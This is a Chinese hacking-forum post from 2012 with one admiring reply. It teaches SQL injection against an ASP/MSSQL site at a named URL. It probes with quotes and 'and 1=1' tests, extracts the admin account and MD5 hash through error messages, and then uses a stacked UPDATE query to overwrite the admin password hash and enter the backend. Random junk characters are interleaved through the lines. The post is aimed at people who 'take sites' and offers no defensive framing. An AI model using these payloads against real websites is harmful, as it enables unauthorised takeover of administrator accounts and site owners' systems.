中国网络渗透测试联盟

标题: SQL注入直接修改管理员密码的MD5值 [打印本页]

作者: admin    时间: 2012-9-13 17:55
标题: SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
6 U6 c2 X3 W  V0 S$ K可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
5 E3 [3 |1 ^* {7 [# ]! t$ p/ l测试如下:0 w# l4 S2 q" I: Q
http://www.tmdsb.com/news.asp?id=1219 @, p; o9 i( L, {; d- B
在地址后输入单引号,显示) f/ g3 Z; u. T1 j' A
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
6 @* i* G) r- y( Z7 s" b9 v  s( ^1 h字符串 ’’’ 之前有未闭合的引号
: ?4 b* n( L5 N8 y$ G/news/tmdws.asp,行63( b% Z+ I* p6 Y- X; o) k2 V
说明没有过滤单引号且数据库是MSSQL.$ d$ f8 A5 [$ B  ^+ ~) t
and 1=1正常。and 1=2出错。肯定存在注入
* l& w& p3 a8 {/ }6 L8 B" C+ q接着输入
# C/ [# `6 q, g2 b# O( c9 B5 c9 phttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)# W- P; q! i8 q, G
得到帐号为:admin- P$ O7 o: b4 T
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)- f1 H- Q! p$ K
得到密码为:a4716077c2ba075c
8 O" I( ~. r9 t4 F7 P! a- f9 R( s接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433( N& p  _, ^5 F: \: }, s+ D: f
命令如下 :
$ i) K: s; d; u8 }9 e;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
5 `; u' _" O% E+ r* \这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
作者: angel    时间: 2012-9-14 16:22
没法说  一个字牛




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2